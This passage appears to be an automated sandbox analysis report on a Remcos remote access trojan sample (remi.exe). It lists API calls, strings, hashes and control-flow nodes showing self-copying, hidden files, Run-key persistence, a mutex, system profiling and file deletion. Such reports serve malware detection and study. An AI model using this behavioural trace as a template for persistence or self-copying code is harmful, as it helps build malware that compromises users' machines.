401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->354 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 395 40e019-40e020 390->395 396 40e00d-40e017 CreateThread 390->396 391->390 398 40e022-40e025 395->398 399 40e033-40e038 395->399 396->395 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\remi.exe,00000104), ref: 0040D790
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                                                                                                                                • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\remi.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                                                                                                                                                                                                • API String ID: 2830904901-3660609477
                                                                                                                                                                                                                                                                                                • Opcode ID: 1484b2f7a7f91c3ee938c637a9a7dae7839d2338987acae383d1c6a0cb17adc1
                                                                                                                                                                                                                                                                                                • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1484b2f7a7f91c3ee938c637a9a7dae7839d2338987acae383d1c6a0cb17adc1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                                                                                                                                                                                                • CopyFileW.KERNELBASE(C:\Users\user\Desktop\remi.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\remi.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                                                                                                                                                • String ID: 6$C:\Users\user\Desktop\remi.exe$del$open$BG$BG
                                                                                                                                                                                                                                                                                                • API String ID: 1579085052-3833309111
                                                                                                                                                                                                                                                                                                • Opcode ID: 1dfc8a95e9f2fa8f15eef755b153a8034996a407d8c67b2864cbd51f99b60f53
                                                                                                                                                                                                                                                                                                • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dfc8a95e9f2fa8f15eef755b153a8034996a407d8c67b2864cbd51f99b60f53
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LongNamePath
                                                                                                                                                                                                                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                                                                                                                                • API String ID: 82841172-425784914
                                                                                                                                                                                                                                                                                                • Opcode ID: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                                                                                                                                                                                                                                                                • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                                                                                                                                                                                                                • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                                                • API String ID: 1866151309-2070987746
                                                                                                                                                                                                                                                                                                • Opcode ID: c28e8bf06c7bd464c54825a7174b2fee0dd0f803164bd22ac966e04bdcbe38d4
                                                                                                                                                                                                                                                                                                • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c28e8bf06c7bd464c54825a7174b2fee0dd0f803164bd22ac966e04bdcbe38d4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 652 412774-412787 RegCreateKeyW 653 4127c6 652->653 654 412789-4127c4 call 4022f8 call 401e07 RegSetValueExW RegCloseKey 652->654 656 4127c8-4127d4 call 401e13 653->656 654->656
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                                                                                                                                                                                                                                                                • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,762337E0,?), ref: 004127AD
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,762337E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                                                                                                                                • API String ID: 1818849710-1051519024
                                                                                                                                                                                                                                                                                                • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                                                                                                                                                                                                                                • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 662 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                • String ID: (CG
                                                                                                                                                                                                                                                                                                • API String ID: 1925916568-4210230975
                                                                                                                                                                                                                                                                                                • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                                                                                                                                                                                                                • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 665 412513-41253f RegOpenKeyExA 666 412541-412567 RegQueryValueExA RegCloseKey 665->666 667 412572 665->667 666->667 668 412569-412570 666->668 669 412577-412583 call 401f66 667->669 668->669
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
                                                                                                                                                                                                                                                                                                • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 672 4124b7-4124df RegOpenKeyExA 673 4124e1-412509 RegQueryValueExA RegCloseKey 672->673 674 41250f-412512 672->674 673->674 675 41250b-41250e 673->675
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                                                                                                                                • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044E1C2
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044E1FB
                                                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E202
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2716640707-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 032fcb4f66621f9a486cbfb9aa35bb7b186a8ceb34f2922937091fe798fd91d5
                                                                                                                                                                                                                                                                                                • Instruction ID: bde093253d31ff8e435db0bb20b1dc60884eb56c9c20eb6ac573b4202a4b54cd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 032fcb4f66621f9a486cbfb9aa35bb7b186a8ceb34f2922937091fe798fd91d5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8E0653714492126F211362B7C89D6F2A1DEFC2775B26013AF50596243EE688D0641EA

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 718 43360d-433610 719 43361f-433622 call 43a88c 718->719 721 433627-43362a 719->721 722 433612-43361d call 442200 721->722 723 43362c-43362d 721->723 722->719 726 43362e-433632 722->726 727 433638-433dec call 433d58 call 437bd7 726->727 728 433ded-433e09 call 433d8b call 437bd7 726->728 727->728
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3476068407-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                                                                                                                                                                                                                                                                • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 738 446aff-446b0b 739 446b3d-446b48 call 445354 738->739 740 446b0d-446b0f 738->740 747 446b4a-446b4c 739->747 742 446b11-446b12 740->742 743 446b28-446b39 RtlAllocateHeap 740->743 742->743 744 446b14-446b1b call 4447c5 743->744 745 446b3b 743->745 744->739 750 446b1d-446b26 call 442200 744->750 745->747 750->739 750->743
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                                                                                                                                                                                                                                                                • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
